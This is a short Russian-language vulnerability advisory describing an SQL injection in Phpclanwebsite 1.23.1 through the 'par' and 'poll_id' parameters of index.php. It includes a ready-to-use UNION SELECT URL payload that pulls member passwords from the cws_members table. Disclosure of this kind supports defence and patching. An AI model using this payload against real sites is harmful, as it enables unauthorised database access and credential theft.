Программа: Phpclanwebsite 1.23.1, возможно более ранние версии

Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"par" и "poll_id" сценария "index.php". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://victim/phpclan/index.php?page=forum&func=post&par=
2%20UNION%20SELECT%20null,null,null,null,null,null,password,null
%20FROM%20cws_members%20WHERE%20member_id=3/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии